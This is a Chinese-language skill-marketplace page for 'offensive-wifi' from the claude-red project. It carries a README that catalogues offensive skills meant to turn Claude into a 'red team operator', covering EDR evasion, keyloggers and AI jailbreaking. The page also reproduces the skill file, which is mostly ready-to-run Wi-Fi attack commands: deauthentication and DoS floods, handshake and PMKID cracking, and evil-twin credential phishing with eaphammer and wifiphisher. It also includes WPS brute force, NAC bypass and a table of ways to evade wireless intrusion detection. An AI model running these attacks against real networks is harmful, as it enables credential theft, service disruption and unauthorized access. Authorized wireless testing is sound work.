SkillAtlasSkill 详情

offensive-wifi

Offensive security skills for Claude — drop-in SKILL.

审核状态:已审核Quality 72Security 52

复制安装命令

用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。

复制前请先查看来源、License 和安全提示。

项目 README

来源文件:README.md

抓取于 2026年8月8日

claude-red banner

claude-red

Offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator.

License: MIT Skills Categories Stars Forks

Built by SnailSploit — GenAI Security Research.


Table of Contents


What is this

claude-red is a curated library of offensive security skills for the Claude Skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse.

Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using.

Use it for: authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically.


Quickstart

Claude Skills System (recommended)

# Clone into a directory Claude will scan
git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red

# Or install only one category
git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red
cd claude-red && git sparse-checkout set Skills/web Skills/active-directory

Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads offensive-sqli).

Claude Code

# Point Claude at a single skill before a session
cat Skills/web/offensive-sqli/SKILL.md | claude --system-file -

# Or load a whole category
cat Skills/active-directory/**/SKILL.md | claude --system-file -

Claude.ai (Manual)

Paste the contents of a SKILL.md into a Project's system prompt or prepend to your conversation.

Install Script

./install.sh                           # interactive
./install.sh --target ~/.claude/skills # explicit target
./install.sh --category web            # one category

Categories

CategorySkillsFocus
Web Application16OWASP Top 10 + business logic + advanced web bug classes
Auth & Identity2JWT, OAuth
Active Directory1On-prem AD attack methodology (expanding)
Wireless13802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz
Cloud1AWS / Azure / GCP attack paths (expanding)
Mobile1Android + iOS pentest (expanding)
IoT & Embedded1Hardware, firmware, RTOS, ICS (expanding)
Infrastructure & Red Team7Initial access, EDR evasion, Windows ops
Exploit Development6Stack/heap, mitigations, crash analysis, TOCTOU
Fuzzing & VR4libFuzzer, AFL++, bug ID, vuln classes
Reconnaissance2OSINT tooling and methodology
AI Security1Prompt injection, jailbreaks, RAG poisoning
Utility2Fast-checking, professional reporting

Skill Index

Web Application

Skills/web/

SkillDescription
offensive-sqliSQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths
offensive-xssCross-site scripting — stored, reflected, DOM, mutation
offensive-ssrfServer-side request forgery — cloud metadata, filter bypass
offensive-sstiServer-side template injection — engine ID, RCE paths
offensive-xxeXML external entity — OOB exfil, blind exploitation
offensive-idorInsecure direct object references — enumeration, business logic
offensive-file-uploadFile upload — extension bypass, polyglots, webshells
offensive-rceRemote code execution — chaining, command injection
offensive-deserializationInsecure deserialization — Java/PHP/.NET gadget chains
offensive-race-conditionRace conditions — TOCTOU, single-packet, limit bypass
offensive-request-smugglingHTTP request smuggling — CL.TE, TE.CL, h2 desync
offensive-open-redirectOpen redirect — OAuth abuse, phishing, SSRF pivots
offensive-parameter-pollutionHTTP parameter pollution — WAF bypass, logic confusion
offensive-graphqlGraphQL — introspection, batching, IDOR via aliases
offensive-waf-bypassWAF bypass — encoding, chunking, case mutation
offensive-business-logicBusiness logic — workflow bypass, pricing, refunds, chains

Auth & Identity

Skills/auth/

SkillDescription
offensive-jwtJWT — alg:none, key confusion, secret cracking
offensive-oauthOAuth — open redirect abuse, token leakage, PKCE bypass

Active Directory

Skills/active-directory/

SkillDescription
offensive-active-directoryAD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD

Note: This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See Roadmap.

Wireless

Skills/wireless/

SkillDescription
offensive-wifi802.11 overview — entrypoint into the wireless category
offensive-wifi-reconAdapter selection, monitor mode, multi-band airspace mapping
offensive-wpa2-pskHandshake capture, PMKID, hashcat 22000 cracking
offensive-wpa3-saeTransition-mode downgrade, Dragonblood, SAE side-channels
offensive-wpa-enterprise802.1X / EAP attacks, eaphammer evil-twin RADIUS
offensive-wpsPixie Dust, online PIN brute, vendor PIN generators
offensive-evil-twinKARMA, Mana, captive portal, post-association MITM
offensive-krack-fragattacksKRACK + FragAttacks supplicant testing
offensive-deauth-disassocTargeted/broadcast deauth, PMF awareness, action frames
offensive-bluetooth-bleBLE GATT enum, pairing downgrade, sniffing, MITM
offensive-bluetooth-classicBR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing
offensive-zigbee-thread-matter802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection
offensive-z-waveS0 key derivation flaw, S2 commissioning, hub pivots
offensive-lorawan-sub-ghzLoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS

Cloud

Skills/cloud/

SkillDescription
offensive-cloudAWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion

Note: Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See Roadmap.

Mobile

Skills/mobile/

SkillDescription
offensive-mobileAndroid + iOS — Frida, pinning, storage, biometric, deep links

IoT & Embedded

Skills/iot/

SkillDescription
offensive-iotHardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP

Note: Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See Roadmap.

Infrastructure & Red Team

Skills/infrastructure/

SkillDescription
offensive-initial-accessPhishing, drive-by, supply chain — TA0001
offensive-advanced-redteamFull kill chain, C2, OPSEC, lateral, persistence
offensive-edr-evasionUnhooking, indirect syscalls, PPID spoofing
offensive-shellcodeWriting, encoding, injection techniques
offensive-keylogger-archKeylogger architecture and input-capture techniques
offensive-windows-mitigationsWindows mitigations — ACG, Arbitrary Code Guard
offensive-windows-boundariesDefeating Windows boundaries — sandbox escape, privilege

Exploit Development

Skills/exploit-dev/

SkillDescription
offensive-exploit-developmentStack/heap, ROP chains, mitigations
offensive-exploit-dev-courseStructured curriculum format
offensive-basic-exploitationLinux exploitation, mitigations disabled — beginner-to-mid
offensive-crash-analysisCrash triage, exploitability assessment, root cause
offensive-mitigationsModern kernel mitigations — ASLR, CFG, CET, PAC
offensive-toctouTime-of-check/use across binary, kernel, web, container

Fuzzing & Vulnerability Research

Skills/fuzzing/

SkillDescription
offensive-fuzzinglibFuzzer, AFL++, coverage-guided, mutation strategies
offensive-fuzzing-courseCurriculum — finding vulns via fuzzing
offensive-bug-identificationCode review patterns, static analysis triggers
offensive-vuln-classesVulnerability classes — real-world examples, taxonomy

Reconnaissance

Skills/recon/

SkillDescription
offensive-osintOSINT tools — recon-ng, theHarvester, Maltego pipelines
offensive-osint-methodologyOSINT methodology — structured intelligence collection

AI Security

Skills/ai/

SkillDescription
offensive-ai-securityAI pentest — prompt injection, jailbreaking, RAG poisoning

Utility

Skills/utility/

SkillDescription
offensive-fast-checkingFast triage checklist — quick-win identification
offensive-reportingPro pentest reporting — CVSS, evidence, exec summary, retest

Roadmap

The library is being expanded in seven phases. Track progress in CHANGELOG.md.

PhaseCategoryNew SkillsStatus
1Internal AD/Windows (rename active-directory/ → internal/)+16Planned
2Cloud Identity (Entra/AAD, ADFS, Okta, M365)+10Planned
3Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz)+12Mandatory
4IoT split (UART/JTAG, flash, fault injection, RTOS, ICS)+10Planned
5Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack)+8Planned
6Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI)+10Planned
7Polish (README, LICENSE, manifest, install)—In progress

End state: ~107 skills across the same 13+ categories.


Contributing

Contributions welcome. See CONTRIBUTING.md for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews.

License

MIT — use freely, attribution appreciated.

Acknowledgements

  • Author: Kai Aizen (SnailSploit) — snailsploit.com
  • Original Checklists: Sahar Shlichov — the offensive checklist collection many of these skills are based on.
  • Community: PRs and feedback that keep the library current with the threat landscape.

"Give Claude the right skill and it stops being a chatbot. It becomes an operator."


📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

https://snailsploit.com/claude-red

Created by Kai Aizen — independent offensive security researcher.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Same attack. Different substrate.

测试与质量

高风险

  • 来源需自行核对维护者身份。
  • 包含脚本或命令调用,安装前请复核。
  • 可能需要外部 token、网络权限或第三方服务。
  • 存在潜在风险命令,请谨慎安装。
  • 扫描发现:4 条。

Codex — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/wireless/offensive-wifi" 文件夹复制到 Codex 的 skills 目录中。
  4. 重启 Codex 让新的 skill 生效。

Codex — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Codex 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Codex 让新的 skill 生效。

Claude Code — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/wireless/offensive-wifi" 文件夹复制到 Claude Code 的 skills 目录中。
  4. 重启 Claude Code 让新的 skill 生效。

Claude Code — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Claude Code 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Claude Code 让新的 skill 生效。

Cursor — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/wireless/offensive-wifi" 文件夹复制到 Cursor 的 skills 目录中。
  4. 重启 Cursor 让新的 skill 生效。

Cursor — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Cursor 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Cursor 让新的 skill 生效。

GitHub Copilot — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/wireless/offensive-wifi" 文件夹复制到 GitHub Copilot 的 skills 目录中。
  4. 重启 GitHub Copilot 让新的 skill 生效。

GitHub Copilot — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 GitHub Copilot 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 GitHub Copilot 让新的 skill 生效。

Windsurf — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/wireless/offensive-wifi" 文件夹复制到 Windsurf 的 skills 目录中。
  4. 重启 Windsurf 让新的 skill 生效。

Windsurf — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Windsurf 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Windsurf 让新的 skill 生效。
查看 SKILL.md 原文
name: offensive-wifi
description: "Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation."

Wireless / 802.11 — Offensive Testing Methodology

Quick Workflow

  1. Pick the right adapter (monitor mode + injection + correct band/PHY for target)
  2. Recon airspace passively — never deauth before you know the topology
  3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
  4. Crack offline; do not rely on online dictionary attacks
  5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

Hardware & Adapter Selection

ChipsetStrengthsNotes
Atheros AR9271 (Alfa AWUS036NHA)Solid 2.4 GHz monitor + injection802.11n only
Realtek RTL8812AU (AWUS036ACH)Dual-band, injectionDriver: aircrack-ng/rtl8812au
MediaTek MT7612U (AWUS036ACM)Stable dual-bandModern kernels in-tree
MediaTek MT7921AUWi-Fi 6 monitor (limited)Patched drivers required
AWUS036AXML / AXMWi-Fi 6E (6 GHz)Bleeding edge — verify per release
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"

Reconnaissance

# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Wigle / Kismet for war-driving
kismet -c wlan0mon

Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.


WPA / WPA2-PSK

Four-way Handshake Capture

# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Verify the EAPOL frames are usable:

hcxpcapngtool -o hash.hc22000 handshake-01.cap

PMKID (No Client Required)

PMKID lives in the first AP-to-station message — you can grab it without anyone connected.

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2

hcxpcapngtool -o hash.hc22000 pmkid.pcapng

Cracking

# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -

WPA3 / SAE

Transition-Mode Downgrade

If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.

Dragonblood (CVE-2019-9494/9495/13377)

Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.

# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon

SAE Auth Flooding (Resource Exhaustion)

sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments

WPA-Enterprise (802.1X / EAP)

Method Identification

# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
Inner MethodAttack
EAP-MSCHAPv2 (PEAP/TTLS)Crack NetNTLMv1-style challenge offline
EAP-GTCCleartext password — capture via rogue RADIUS
EAP-TLSSteal client cert (often in user keychain / DPAPI / NDES)
EAP-PWDDragonblood-class side channels

Evil-Twin RADIUS (MSCHAPv2 / GTC)

# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt

Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.

EAP-TLS Cert Theft Paths

  • DPAPI master key + cert blob from user profile (%APPDATA%\Microsoft\SystemCertificates)
  • NDES misconfig (ESC8-class cert request abuse)
  • ADCS user auto-enrollment template with weak ACL

WPS

Pixie Dust (Offline)

# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.

Online PIN Brute (Last Resort)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy

Evil Twin / KARMA / Mana

Stock Evil Twin (Captive Portal)

# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon

KARMA / Mana (Probe Exploitation)

Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.

# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal

MAC Randomization Defeat

iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.


KRACK & FragAttacks

AttackClassTarget
KRACK (CVE-2017-13077..082)Key reinstallationUnpatched WPA2 supplicants
FragAttacks (CVE-2020-24586..588)Fragmentation/aggregationMost pre-2021 implementations

Test a network's patch status:

# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0

Deauth / Disassociation Attacks

# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon

# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt

# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m

802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.


802.1X / Wired NAC Bypass (Adjacent)

# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e

# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0  # variants for wired

Wi-Fi 6 / 6E / 7 Considerations

  • 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
  • OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
  • TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
  • MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.

Sidebands & Adjacent Wireless

TechToolNotes
Bluetooth Classicredfang, crackle, btproxyLMP/L2CAP fuzzing
BLEbettercap, Sniffle (TI CC1352), FrontlineGATT enumeration, LE Secure Connections downgrade
Zigbee / 802.15.4KillerBee, apimote, ATUSBTouchlink commissioning abuse
Z-WaveZ-Force, EZ-WaveS0 key reuse bug class
LoRa / LoRaWANLoRaPWN, ChirpStackJoin-request replay, ABP key reuse
433/868 MHz (Sub-GHz)HackRF / Flipper ZeroGarage doors, doorbells, telemetry

RADIUS / Backend Pivots Post-Compromise

# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD
nxc smb dc -u captured_user -p cracked_pass --pass-pol

# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets
# If on Windows NPS, pivot via the service account context

Engagement Cheatsheet

# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo iw reg set US

# 2. Recon (do not deauth yet)
sudo airodump-ng wlan0mon --band abg --write recon

# 3. PMKID sweep (passive)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# 4. Targeted capture if PMKID empty
sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon &
sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon

# 5. Crack offline
hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule

# 6. If enterprise → eaphammer evil twin
# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time

Detection / Defender View

AP/WIDS DetectorTriggerEvasion
Excessive deauth>5 deauth/sec from one source MACSpread across spoofed MACs, target individuals
Rogue AP detectionUnauthorized BSSID on monitored channelMatch real BSSID's beacon timing/IE order exactly
Karma response anomalyAP answering all probe SSIDsUse Mana mode, pick one plausible SSID
WPS lockoutRepeated PIN failuresPixie Dust offline only, abandon online brute
RADIUS log: cert mismatchSupplicant rejects evil-twin certUse copies of victim CA-signed certs (unlikely)

Key References

发现问题?提交给管理员复核

评分:

评论 (0)

暂无评论,成为第一个评论者吧!